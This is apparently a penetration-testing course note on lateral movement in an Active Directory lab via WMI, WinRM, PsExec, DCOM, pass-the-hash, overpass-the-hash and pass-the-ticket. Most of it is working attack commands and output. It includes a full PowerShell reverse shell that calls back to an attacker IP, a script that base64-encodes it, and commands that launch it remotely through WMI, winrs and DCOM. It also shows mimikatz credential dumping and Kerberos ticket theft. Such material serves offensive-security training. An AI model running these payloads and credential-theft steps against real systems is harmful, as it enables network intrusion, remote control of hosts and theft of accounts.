Lateral Movement in AD

Lateral Movement

Lateral Movement is a tactic that aims at gaining further access within a target network. Lateral Movement techniques may use the current valid account or reuse authentication material such as password hashes, Kerberos itckets, and application access tokens obtained from previous attack stages.

WMI For Lateral Movement

The Windows Management Intrumentation (WMI) is an object-oriented feature that facilitates task automation.

WMI is capable of creating processes via the Create method from the Win32_Process class. It communicates through Remote Procedure Calls (RPC) over port 135 for remote access and uses a higher-range port (19152-65535) for session data.

Creating a WMI Process

To create a process on a remote target via WMI, it requires the credentials of a member of the Administrators local group, which could also be a domain user.

Using wmic

C:\Users\jeff>wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 752;
        ReturnValue = 0;
};

The WMI job will return the PIC of the newly created process and return a value of "0" meaning that the process has been created successfully.

Using PowerShell

In order to start a WMI Process with PowerShell, we first will need to create a PSCredential object that will store session username and password. In the example below, our PSCredential will be stored in the variable $secureString

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Once we have a PSCredential object, we will create a Common Information Model (CIM) using the New-CimSession cmdlet.

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options 
$command = 'calc';

Now we can use the Invoke-CimMethod cmdlet to create the process.

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Obtaining a Reverse Shell With WMI

Python script to base64 encode a PowerShell reverse shell

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

kali@kali:~$ python3 encode.py
powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAU...
OwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

Next, set up a listener on the attack machine and run the PowerShell WMI script on the target machine.

PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

PS C:\Users\jeff> $Options = New-CimSessionOption -Protocol DCOM
PS C:\Users\jeff> $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options

PS C:\Users\jeff> $Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';

PS C:\Users\jeff> Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

ProcessId ReturnValue PSComputerName
--------- ----------- --------------
     3948           0 192.168.50.73

WinRM For Lateral Movement

WinRM is the Microsoft version of the WS-Management protocol and it exchanges XML messages over HTTP and HTTPS. It uses TCP port 5986 for encrypted HTTPS traffic and port 5985 for plain HTTP.

In addition to its PowerShell implementation, WimRM is implemented in several built-in utilities such as winrs (Windows Remote Shell).

For WinRS to work, the domain user needs to be a member of the Administrators or Remote Management Users group on the target host.

WinRS

The winrs utility can be invoked by specifying the target host through the -r: argument and the username with -u: and password with -p. We can then specify the commands to be executed on the remote host.

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"
FILES04
corp\jen

WinRS Reverse Shell

WinRS can be used to execute a Base64 encoded reverse-shell payload

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

PowerShell Remoting

PowerShell also has WinRM built-in capabilities called PowerShell remoting, which can be invoked via the New-PSSession cmdlet by providing the IP of the target host along with the credentials in a credential object format.

PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

PS C:\Users\jeff> New-PSSession -ComputerName 192.168.50.73 -Credential $credential

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  1 WinRM1          192.168.50.73   RemoteMachine   Opened        Microsoft.PowerShell     Available

To interact with the session ID that was created, the Enter-PSSession cmdlet can be used:

PS C:\Users\jeff> Enter-PSSession 1
[192.168.50.73]: PS C:\Users\jen\Documents> whoami
corp\jen

[192.168.50.73]: PS C:\Users\jen\Documents> hostname
FILES04

PsExec for Lateral Movement

PsExec is part of the SysInternals suite intended to replace telnet-like applications and provide remote exectuion of processes on other systems through an interactive console.

PsExec can be used for lateral movment under the following conditions:

The user that authenticates to the target machine needs to be part of the Administrators local group
The ADMIN$ share must be available
File and Printer Sharing has to be turned on

The seconds and third requirements are met by default on modern Windows Server systems, but may have been explicitly disabled.

To execute the commond remotely, PsExec performs the following:

Writes psexesvc.exe into the C:\Windows directory
Creates and spawns a service on the remote host
Runs the requested program/command as a child process of psexesvc.exe

PsExec is not installed by default on Windows, and will likely need to be transferred from our attacking machine to a compromised target machine.

PS C:\Tools\SysinternalsSuite> ./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
FILES04

C:\Windows\system32>whoami
corp\jen

Pass the Hash Attack

Pass the Hash (PtH) attacks allow an attacker to authenticate to a remote system or service using a user's NTLM hash instead of a plaintext password. This only works for servers or services using NTLM authentication, not for services or servers using Kerberos authentication.

Tools that use PtH:

PsExec from Metasploit https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
Passing-the-hash toolkit https://github.com/byt3bl33d3r/pth-toolkit
Impacket https://github.com/CoreSecurity/impacket/blob/master/examples/smbclient.py

The following are required for a successful PtH attack:

Requires an SMB connection through any firewall (typically port 445)
The Windows File and Printer Sharing feature must be enabled
An admin share called ADMIN$ needs to be available.

To establish a connection to the ADMIN$ share, the attacker must present valid credentials for a user with local administrative permissions. This type of attack often requires local administrative rights. PtH attacks use the NTLM hash legitimately. However, the vulnerability lies in the fact that we gained unauthorized access to the password hash of a local administrator.

wmiexec to Perform PtH

kali@kali:~$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
FILES04

C:\>whoami
files04\administrator

Overpass the Hash for Lateral Movement

Overpass the hash can "over" abuse an NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT). This TGT can then be used to obtain a Ticket Granting Service (TGS).

Example of Overpass the Hash

Assume you have a compromised workstation or server that a user has authenticated to. We can also assume that the machine is now caching their credentials (and therefore their NTLM hash).

To simulate these cached credentials, we can log in to the machine as a compromised user and run a process as the target user, which will prompt for authentication.

The most simple way of running a process as another user is if we have access to the GUI desktop via RDP and right click a program icon then shift left click "show more options" on the popup an select Run as different user.

From here, we sign in with our target user's credentials which will launch the program in the context of the target user. After the authentication is successful, the target user's credentials will be cached on the machine.

To validate the cached credentials, we can open an Administrative shell and use mimikatz to dump the logonpasswords.

mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords

...
Authentication Id : 0 ; 1142030 (00000000:00116d0e)
Session           : Interactive from 0
User Name         : jen
Domain            : CORP
Logon Server      : DC1
Logon Time        : 2/27/2023 7:43:20 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1124
        msv :
         [00000003] Primary
         * Username : jen
         * Domain   : CORP
         * NTLM     : 369def79d8372408bf6e93364cc93075
         * SHA1     : faf35992ad0df4fc418af543e5f4cb08210830d4
         * DPAPI    : ed6686fedb60840cd49b5286a7c08fa4
        tspkg :
        wdigest :
         * Username : jen
         * Domain   : CORP
         * Password : (null)
        kerberos :
         * Username : jen
         * Domain   : CORP.COM
         * Password : (null)
        ssp :
        credman :
...

The goal of the overpass the hash lateral movement technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of any NTLM authentication.

Mimikatz for Overpass the Hash

We can use the mimikatz sekurlsa::pth command to perform an overpass the hash attack. The command creates a new PowerShell process in the context of our target user. This new PowerShell prompt allows us to obtain Kerberos tickets without performing NTLM authentication over the network.

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell 
user    : jen
domain  : corp.com
program : powershell
impers. : no
NTLM    : 369def79d8372408bf6e93364cc93075
  |  PID  8716
  |  TID  8348
  |  LSA Process is now R/W
  |  LUID 0 ; 16534348 (00000000:00fc4b4c)
  \_ msv1_0   - data copy @ 000001F3D5C69330 : OK !
  \_ kerberos - data copy @ 000001F3D5D366C8
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 000001F3D5C63B68 (32) -> null

At this point, we have a PowerShell session that allows us to execute commands as the target user. We can then list cached Kerberos tickets with klist.

PS C:\Windows\system32> klist

Current LogonId is 0:0x1583ae

Cached Tickets: (0)

If no Kerberos tickets are cached, it is because no interactive login has been performed. We can generate a TGT by authenticating to a network share on a target server using net use.

PS C:\Windows\system32> net use \\files04
The command completed successfully.

listing the cached Kerberos tickets now reveals the following:

PS C:\Windows\system32> klist

Current LogonId is 0:0x17239e

Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.corp.com

#1>     Client: jen @ CORP.COM
        Server: cifs/files04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com

We now have the TGT and a TGS, in this case for the Common Internet File System (CIFS) service.

You can distinguish a ticket being a TGT because the server is krbtgt.

We can now use tools that rely on Kerberos authentication as opposed to NTLM.

Using PsExec with stolen TGT

Now that we have a Kerberos TGT, we can use PsExec with the TGT. PsExec can run a command remately but does not accept password hashes.

PS C:\Windows\system32> cd C:\tools\SysinternalsSuite\
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>hostname
FILES04

Pass the Ticket Attack

How the Attack Works

The Overpass the Hash attack uses a captured NTLM hash to acquire a Kerberos TGT allowing authentication using Kerberos. We can only use the TGT on the machine that it was created for, but a TGS would be more flaxible.

The Pass the Ticket attack takes advantage of the TGS, which can be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required.

Performing the Attack

In this example scenario, we have an existing session for the user dave. The dave user has privileged access to the backup folder located on WEB04 whereas our logged-in user jen does not. We are going to extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our session. This will allow us to access the restricted folder.

From jen's computer, we will open an administrator shell and use Mimikatz to export the current TGT/TGS from memory

mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session           : Batch from 0
User Name         : dave
Domain            : CORP
Logon Server      : DC1
Logon Time        : 9/14/2022 6:24:17 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1103

         * Username : dave
         * Domain   : CORP.COM
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Target Name  (02) : krbtgt ; CORP ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
           Flags 40c10000    : name_canonicalize ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1f1626]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi !
...

We can now see we have exported all of the TGT/TGS saved in a kirbi mimikatz format:

PS C:\Tools> dir *.kirbi


    Directory: C:\Tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;12bd0]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c6860]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c6860]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c933d]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c933d]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
...

we can now pick any TGS ticket in the .kirbi format and inject it through mimikatz

mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OK

We can now see that the ticket is listed when running klist

PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

We can now access the share that dave has exclusive access to:

PS C:\Tools> ls \\web04\backup


    Directory: \\web04\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

Distributed Component Object Model (DCOM)

This is a fairly recent lateral movement technique that exploit the Distributed Component Object Model (DCOM). The Microsoft Component Object Model (COM) is a system for creating software components that interact with each other. While COM was created for either same-process or cross-process interaction, it was extended to Distributed Component Object Model (DCOM) fori nteraction between multiple computers over a network.

Both Interaction with DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM service Control Manager, which is essentially an API.

The DCOM lateral movement technique is based on the Microsoft Management Console (MMC) COM application that is employed for scripted automation of Windows systems.

The MMC Application Class allows the creation of Application Objects, which expose the ExecuteShellCommand method under the Document.ActiveView property. As its name suggests, this method allows the execution of any shell command as long as the authenticated user is authorized, which is the default for local administrators.

Performing the Attack

From a PowerShell prompt, we can instantiate a remote MMC 2.0 application by specifying the target IP as the second argument of the GetTypeFromProgID method.

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))

Once the application object is saved into the $dcom variable, we can pass the required argument to the application via the ExecuteShellCommand method. The method accepts four parameters: Command, Directory, Parameters, and WindowState.

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Once these two PowerShell lines are executed, we should have spawned an instance.

Reverse Shell with DCOM

We can use an encoded PowerShell reverse shell payload:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

PreviousActive Directory Persistence NextWinRM for Lateral Movement

Last updated 1 year ago